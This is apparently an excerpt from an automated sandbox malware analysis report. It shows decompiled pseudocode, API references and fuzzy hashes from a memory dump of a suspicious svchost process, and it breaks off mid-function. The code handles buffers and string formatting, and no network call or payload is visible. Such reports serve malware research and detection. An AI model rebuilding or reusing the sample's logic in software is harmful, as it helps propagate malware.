                                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				void* _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr* _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                                    				void* _t101;
                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                    				signed int _t103;
                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t102 = __esi;
                                                                                                                                                                                                                                                    				_t101 = __edi;
                                                                                                                                                                                                                                                    				_t79 = __ebx;
                                                                                                                                                                                                                                                    				_v16 =  *0x429024 ^ _t103;
                                                                                                                                                                                                                                                    				_v72 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					_v40 =  *0x426f90;
                                                                                                                                                                                                                                                    					_v36 =  *0x426f94;
                                                                                                                                                                                                                                                    					_v32 =  *0x426f98;
                                                                                                                                                                                                                                                    					_v28 =  *0x426f9c;
                                                                                                                                                                                                                                                    					_v24 =  *0x426fa0;
                                                                                                                                                                                                                                                    					_v20 =  *0x426fa4;
                                                                                                                                                                                                                                                    					_t59 = E04020CE0(8);
                                                                                                                                                                                                                                                    					_t104 = _t104 + 4;
                                                                                                                                                                                                                                                    					_v52 = _t59;
                                                                                                                                                                                                                                                    					if(_v52 == 0) {
                                                                                                                                                                                                                                                    						_v76 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v76 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v12 = _v76;
                                                                                                                                                                                                                                                    					E0401FC90(_t79, _v12, _t101, _t102,  &_v40, 0x14);
                                                                                                                                                                                                                                                    					_t99 = _v12;
                                                                                                                                                                                                                                                    					if((E04015C60(_t79, _v72, _v12, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_v48 = 0;
                                                                                                                                                                                                                                                    						_t99 = _v12;
                                                                                                                                                                                                                                                    						_t69 = E0401BCB0(_t101, 3,  *_v12,  &_v48);
                                                                                                                                                                                                                                                    						_t104 = _t104 + 0xc;
                                                                                                                                                                                                                                                    						_v44 = _t69;
                                                                                                                                                                                                                                                    						if(_v44 > 0) {
                                                                                                                                                                                                                                                    							_t70 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t105 = _t104 + 4;
                                                                                                                                                                                                                                                    							_v56 = _t70;
                                                                                                                                                                                                                                                    							if(_v56 == 0) {
                                                                                                                                                                                                                                                    								_v80 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v80 = E0401F4E0(_v56);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v8 = _v80;
                                                                                                                                                                                                                                                    							_t72 = E040070A0( *((intOrPtr*)( *_v48 + 4)));
                                                                                                                                                                                                                                                    							_t104 = _t105 + 4;
                                                                                                                                                                                                                                                    							_t99 = _v48;
                                                                                                                                                                                                                                                    							E0401FC90(_t79, _v8, _t101, _t102,  *((intOrPtr*)( *_v48 + 4)), _t72);
                                                                                                                                                                                                                                                    							if(_v48 != 0) {
                                                                                                                                                                                                                                                    								_t99 = _v48;
                                                                                                                                                                                                                                                    								_v60 = _v48;
                                                                                                                                                                                                                                                    								E04020CC0(_v60);
                                                                                                                                                                                                                                                    								_t104 = _t104 + 4;
                                                                                                                                                                                                                                                    								_v48 = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v68 = _v12;
                                                                                                                                                                                                                                                    						_t99 = _v68;
                                                                                                                                                                                                                                                    						_v64 = _v68;
                                                                                                                                                                                                                                                    						if(_v64 == 0) {
                                                                                                                                                                                                                                                    							_v84 = 0;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v84 = E04004EA0(_v64, 1);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v12 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} while (0 != 0);
                                                                                                                                                                                                                                                    				return E04006C8C(_v8, _t79, _v16 ^ _t103, _t99, _t101, _t102);
                                                                                                                                                                                                                                                    			}

































                                                                                                                                                                                                                                                    0x040126b0
                                                                                                                                                                                                                                                    0x040126b0
                                                                                                                                                                                                                                                    0x040126b0
                                                                                                                                                                                                                                                    0x040126bd
                                                                                                                                                                                                                                                    0x040126c0
                                                                                                                                                                                                                                                    0x040126c3
                                                                                                                                                                                                                                                    0x040126ca
                                                                                                                                                                                                                                                    0x040126cf
                                                                                                                                                                                                                                                    0x040126d8
                                                                                                                                                                                                                                                    0x040126e1
                                                                                                                                                                                                                                                    0x040126e9
                                                                                                                                                                                                                                                    0x040126f2
                                                                                                                                                                                                                                                    0x040126fb
                                                                                                                                                                                                                                                    0x04012700
                                                                                                                                                                                                                                                    0x04012705
                                                                                                                                                                                                                                                    0x04012708
                                                                                                                                                                                                                                                    0x0401270f
                                                                                                                                                                                                                                                    0x0401271e
                                                                                                                                                                                                                                                    0x04012711
                                                                                                                                                                                                                                                    0x04012719
                                                                                                                                                                                                                                                    0x04012719
                                                                                                                                                                                                                                                    0x04012728
                                                                                                                                                                                                                                                    0x04012734
                                                                                                                                                                                                                                                    0x04012739
                                                                                                                                                                                                                                                    0x0401274a
                                                                                                                                                                                                                                                    0x04012750
                                                                                                                                                                                                                                                    0x0401275b
                                                                                                                                                                                                                                                    0x04012763
                                                                                                                                                                                                                                                    0x04012768
                                                                                                                                                                                                                                                    0x0401276b
                                                                                                                                                                                                                                                    0x04012772
                                                                                                                                                                                                                                                    0x04012776
                                                                                                                                                                                                                                                    0x0401277b
                                                                                                                                                                                                                                                    0x0401277e
                                                                                                                                                                                                                                                    0x04012785
                                                                                                                                                                                                                                                    0x04012794
                                                                                                                                                                                                                                                    0x04012787
                                                                                                                                                                                                                                                    0x0401278f
                                                                                                                                                                                                                                                    0x0401278f
                                                                                                                                                                                                                                                    0x0401279e
                                                                                                                                                                                                                                                    0x040127aa
                                                                                                                                                                                                                                                    0x040127af
                                                                                                                                                                                                                                                    0x040127b3
                                                                                                                                                                                                                                                    0x040127bf
                                                                                                                                                                                                                                                    0x040127c8
                                                                                                                                                                                                                                                    0x040127ca
                                                                                                                                                                                                                                                    0x040127cd
                                                                                                                                                                                                                                                    0x040127d4
                                                                                                                                                                                                                                                    0x040127d9
                                                                                                                                                                                                                                                    0x040127dc
                                                                                                                                                                                                                                                    0x040127dc
                                                                                                                                                                                                                                                    0x040127c8
                                                                                                                                                                                                                                                    0x04012772
                                                                                                                                                                                                                                                    0x040127e7
                                                                                                                                                                                                                                                    0x040127ec
                                                                                                                                                                                                                                                    0x040127ef
                                                                                                                                                                                                                                                    0x040127f2
                                                                                                                                                                                                                                                    0x040127f9
                                                                                                                                                                                                                                                    0x0401280a
                                                                                                                                                                                                                                                    0x040127fb
                                                                                                                                                                                                                                                    0x04012805
                                                                                                                                                                                                                                                    0x04012805
                                                                                                                                                                                                                                                    0x04012811
                                                                                                                                                                                                                                                    0x04012811
                                                                                                                                                                                                                                                    0x04012818
                                                                                                                                                                                                                                                    0x04012830

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04012714
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401278A
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 040127AA
                                                                                                                                                                                                                                                    • codecvt.LIBCPMTD ref: 04012800
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::_std::_$_strlencodecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4053968246-0
                                                                                                                                                                                                                                                    • Opcode ID: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                    • Instruction ID: af42a25bd155b3b5d7a86e069f6b5acb66482dcb96fdedbe39403f86dc1ab7a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169dd0bcd0e1bc8557198bf3e789645acc63f33ee09107aa3db1908fa965f152
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4951D6B4E01208AFEB14DFA4E984BEEBBB1BF48308F108169E815B73A0D7716945CF55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E04014EC0(intOrPtr __ecx) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v40 = __ecx;
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v40 + 4)) != 0) {
                                                                                                                                                                                                                                                    					_v12 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                                                                                    					_v8 = _v12;
                                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                                    						_v44 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v44 = E04006720(_v8, 1);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v40 + 4)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v40 + 8)) != 0) {
                                                                                                                                                                                                                                                    					_v20 =  *((intOrPtr*)(_v40 + 8));
                                                                                                                                                                                                                                                    					_v16 = _v20;
                                                                                                                                                                                                                                                    					if(_v16 == 0) {
                                                                                                                                                                                                                                                    						_v48 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v48 = E04006750(_v16, 1);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v40 + 8)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_v40 + 0xc)) != 0) {
                                                                                                                                                                                                                                                    					_v28 =  *((intOrPtr*)(_v40 + 0xc));
                                                                                                                                                                                                                                                    					_v24 = _v28;
                                                                                                                                                                                                                                                    					if(_v24 == 0) {
                                                                                                                                                                                                                                                    						_v52 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v52 = E04004EA0(_v24, 1);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v40 + 0xc)) = 0x666;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t55 = _v40;
                                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_t55 + 0x20)) != 0) {
                                                                                                                                                                                                                                                    					_v36 =  *((intOrPtr*)(_v40 + 0x20));
                                                                                                                                                                                                                                                    					_t56 = _v36;
                                                                                                                                                                                                                                                    					_v32 = _t56;
                                                                                                                                                                                                                                                    					if(_v32 == 0) {
                                                                                                                                                                                                                                                    						_v56 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t56 = E04004EA0(_v32, 1);
                                                                                                                                                                                                                                                    						_v56 = _t56;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_v40 + 0x20)) = 0x666;
                                                                                                                                                                                                                                                    					return _t56;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t55;
                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                    0x04014ec6
                                                                                                                                                                                                                                                    0x04014ed0
                                                                                                                                                                                                                                                    0x04014ed8
                                                                                                                                                                                                                                                    0x04014ede
                                                                                                                                                                                                                                                    0x04014ee5
                                                                                                                                                                                                                                                    0x04014ef6
                                                                                                                                                                                                                                                    0x04014ee7
                                                                                                                                                                                                                                                    0x04014ef1
                                                                                                                                                                                                                                                    0x04014ef1
                                                                                                                                                                                                                                                    0x04014f00
                                                                                                                                                                                                                                                    0x04014f00
                                                                                                                                                                                                                                                    0x04014f0e
                                                                                                                                                                                                                                                    0x04014f16
                                                                                                                                                                                                                                                    0x04014f1c
                                                                                                                                                                                                                                                    0x04014f23
                                                                                                                                                                                                                                                    0x04014f34
                                                                                                                                                                                                                                                    0x04014f25
                                                                                                                                                                                                                                                    0x04014f2f
                                                                                                                                                                                                                                                    0x04014f2f
                                                                                                                                                                                                                                                    0x04014f3e
                                                                                                                                                                                                                                                    0x04014f3e
                                                                                                                                                                                                                                                    0x04014f4c
                                                                                                                                                                                                                                                    0x04014f54
                                                                                                                                                                                                                                                    0x04014f5a
                                                                                                                                                                                                                                                    0x04014f61
                                                                                                                                                                                                                                                    0x04014f72
                                                                                                                                                                                                                                                    0x04014f63
                                                                                                                                                                                                                                                    0x04014f6d
                                                                                                                                                                                                                                                    0x04014f6d
                                                                                                                                                                                                                                                    0x04014f7c
                                                                                                                                                                                                                                                    0x04014f7c
                                                                                                                                                                                                                                                    0x04014f83
                                                                                                                                                                                                                                                    0x04014f8a
                                                                                                                                                                                                                                                    0x04014f92
                                                                                                                                                                                                                                                    0x04014f95
                                                                                                                                                                                                                                                    0x04014f98
                                                                                                                                                                                                                                                    0x04014f9f
                                                                                                                                                                                                                                                    0x04014fb0
                                                                                                                                                                                                                                                    0x04014fa1
                                                                                                                                                                                                                                                    0x04014fa6
                                                                                                                                                                                                                                                    0x04014fab
                                                                                                                                                                                                                                                    0x04014fab
                                                                                                                                                                                                                                                    0x04014fba
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04014fba
                                                                                                                                                                                                                                                    0x04014fc4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662085145-0
                                                                                                                                                                                                                                                    • Opcode ID: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                    • Instruction ID: 6fde489f6c5f844b1c7bf651d9850ea7eb6d4f342482ed0b4f1dd667ca52f8cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D416E74A00209DBDB04CF94D694BEEBBF2BB48308F248199D4057B3A1D776AE85DF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                                    			E0400CBC9(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t30 = __eflags;
                                                                                                                                                                                                                                                    				_t26 = __edi;
                                                                                                                                                                                                                                                    				_t25 = __edx;
                                                                                                                                                                                                                                                    				_t22 = __ebx;
                                                                                                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                                                                                                    				_push(0x427b08);
                                                                                                                                                                                                                                                    				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                    				_t28 = E04009556(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                                                                    				if(( *(_t28 + 0x70) &  *0x429cb0) == 0) {
                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                    					E0400B404(_t22, 0xc);
                                                                                                                                                                                                                                                    					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                                                                    					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                                                                    					_t26 =  *0x4294d8;
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t29 - 0x1c)) = E0400CB8B(_t8,  *0x4294d8);
                                                                                                                                                                                                                                                    					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                    					E0400CC33();
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t28 =  *((intOrPtr*)(E04009556(__ebx, __edx, __edi, _t32) + 0x6c));
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                                    					E040099DE(_t25, _t26, 0x20);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return E04009D2D(_t28);
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x0400cbc9
                                                                                                                                                                                                                                                    0x0400cbc9
                                                                                                                                                                                                                                                    0x0400cbc9
                                                                                                                                                                                                                                                    0x0400cbc9
                                                                                                                                                                                                                                                    0x0400cbc9
                                                                                                                                                                                                                                                    0x0400cbcb
                                                                                                                                                                                                                                                    0x0400cbd0
                                                                                                                                                                                                                                                    0x0400cbda
                                                                                                                                                                                                                                                    0x0400cbe4
                                                                                                                                                                                                                                                    0x0400cc08
                                                                                                                                                                                                                                                    0x0400cc0a
                                                                                                                                                                                                                                                    0x0400cc10
                                                                                                                                                                                                                                                    0x0400cc14
                                                                                                                                                                                                                                                    0x0400cc17
                                                                                                                                                                                                                                                    0x0400cc22
                                                                                                                                                                                                                                                    0x0400cc25
                                                                                                                                                                                                                                                    0x0400cc2c
                                                                                                                                                                                                                                                    0x0400cbe6
                                                                                                                                                                                                                                                    0x0400cbe6
                                                                                                                                                                                                                                                    0x0400cbea
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400cbec
                                                                                                                                                                                                                                                    0x0400cbf1
                                                                                                                                                                                                                                                    0x0400cbf1
                                                                                                                                                                                                                                                    0x0400cbea
                                                                                                                                                                                                                                                    0x0400cbf6
                                                                                                                                                                                                                                                    0x0400cbfa
                                                                                                                                                                                                                                                    0x0400cbff
                                                                                                                                                                                                                                                    0x0400cc07

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0400CBD5
                                                                                                                                                                                                                                                      • Part of subcall function 04009556: __getptd_noexit.LIBCMT ref: 04009559
                                                                                                                                                                                                                                                      • Part of subcall function 04009556: __amsg_exit.LIBCMT ref: 04009566
                                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0400CBEC
                                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 0400CBFA
                                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 0400CC0A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                                                                                                                                    • Opcode ID: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                    • Instruction ID: 775b438eefefd3dc35736b17a6f12e75e8ac1b8e9e2c3c2db30c63f4ae9875e3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EF06D71A19704CBF724BBA98801B8933E06B0072CF55C219C041BB2D1CB34B902CB55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                                                                                                                                    			E0401F9F0(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				void _v84;
                                                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                                                    				signed short _v90;
                                                                                                                                                                                                                                                    				signed short _v92;
                                                                                                                                                                                                                                                    				signed short _v94;
                                                                                                                                                                                                                                                    				signed short _v96;
                                                                                                                                                                                                                                                    				signed short _v98;
                                                                                                                                                                                                                                                    				signed short _v102;
                                                                                                                                                                                                                                                    				signed short _v104;
                                                                                                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                                                                                                    				intOrPtr _v112;
                                                                                                                                                                                                                                                    				intOrPtr _v116;
                                                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                                                                                                                    				intOrPtr _v136;
                                                                                                                                                                                                                                                    				intOrPtr* _v140;
                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                                                                    				void* _t180;
                                                                                                                                                                                                                                                    				signed int _t209;
                                                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t180 = __edx;
                                                                                                                                                                                                                                                    				_t149 = __ebx;
                                                                                                                                                                                                                                                    				_v28 =  *0x429024 ^ _t209;
                                                                                                                                                                                                                                                    				_v140 = __ecx;
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0 && _a8 >= 1) {
                                                                                                                                                                                                                                                    					_v16 = _a4;
                                                                                                                                                                                                                                                    					_v12 = _a8;
                                                                                                                                                                                                                                                    					if(_a12 != 0) {
                                                                                                                                                                                                                                                    						memcpy( &_v84, 0x427564, 0xd << 2);
                                                                                                                                                                                                                                                    						asm("movsw");
                                                                                                                                                                                                                                                    						asm("movsb");
                                                                                                                                                                                                                                                    						_v20 = 0x200;
                                                                                                                                                                                                                                                    						_v112 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                    						_v24 = _v112;
                                                                                                                                                                                                                                                    						E04007010(0x42757e, _v24, 0, _v20 + 1);
                                                                                                                                                                                                                                                    						 *0x4250e8( &_v104);
                                                                                                                                                                                                                                                    						 *0x4251f8(_v24, _v20 + 1,  &_v84, _v104 & 0x0000ffff, _v102 & 0x0000ffff, _v98 & 0x0000ffff, _v96 & 0x0000ffff, _v94 & 0x0000ffff, _v92 & 0x0000ffff, _v90 & 0x0000ffff, _a12);
                                                                                                                                                                                                                                                    						_v88 = E040070A0(_v24);
                                                                                                                                                                                                                                                    						_v116 = E04020CE0(_a8 + _v88);
                                                                                                                                                                                                                                                    						_v16 = _v116;
                                                                                                                                                                                                                                                    						_push(_v88);
                                                                                                                                                                                                                                                    						E04006CA0(_t149, 0x42757e, 0x427564, _v16, _v24);
                                                                                                                                                                                                                                                    						_push(_a8);
                                                                                                                                                                                                                                                    						E04006CA0(_t149, 0x42757e, 0x427564, _v16 + _v88, _a4);
                                                                                                                                                                                                                                                    						_t210 = _t210 + 0x68;
                                                                                                                                                                                                                                                    						_v12 = _a8 + _v88;
                                                                                                                                                                                                                                                    						if(_v24 != 0) {
                                                                                                                                                                                                                                                    							_v120 = _v24;
                                                                                                                                                                                                                                                    							E04020CC0(_v120);
                                                                                                                                                                                                                                                    							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                    							_v24 = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if( *_v140 != 0) {
                                                                                                                                                                                                                                                    						_v128 = E04020CE0( *((intOrPtr*)(_v140 + 4)) + _v12);
                                                                                                                                                                                                                                                    						_v108 = _v128;
                                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_v140 + 4)));
                                                                                                                                                                                                                                                    						E04006CA0(_t149, 0x42757e, 0x427564, _v108,  *_v140);
                                                                                                                                                                                                                                                    						_push(_v12);
                                                                                                                                                                                                                                                    						E04006CA0(_t149, 0x42757e, 0x427564, _v108 +  *((intOrPtr*)(_v140 + 4)), _v16);
                                                                                                                                                                                                                                                    						_t210 = _t210 + 0x1c;
                                                                                                                                                                                                                                                    						if( *_v140 != 0) {
                                                                                                                                                                                                                                                    							_v132 =  *_v140;
                                                                                                                                                                                                                                                    							E04020CC0(_v132);
                                                                                                                                                                                                                                                    							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                    							 *_v140 = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *_v140 = _v108;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v140 + 4)) =  *((intOrPtr*)(_v140 + 4)) + _v12;
                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v124 = E04020CE0(_v12);
                                                                                                                                                                                                                                                    						 *_v140 = _v124;
                                                                                                                                                                                                                                                    						_push(_v12);
                                                                                                                                                                                                                                                    						E04006CA0(_t149, 0x42757e, 0x427564,  *_v140, _v16);
                                                                                                                                                                                                                                                    						_t210 = _t210 + 0x10;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v140 + 4)) = _v12;
                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v16 != _a4 && _v16 != 0) {
                                                                                                                                                                                                                                                    						_v136 = _v16;
                                                                                                                                                                                                                                                    						E04020CC0(_v136);
                                                                                                                                                                                                                                                    						_t210 = _t210 + 4;
                                                                                                                                                                                                                                                    						_v16 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t180 = 0;
                                                                                                                                                                                                                                                    					if(0 != 0) {
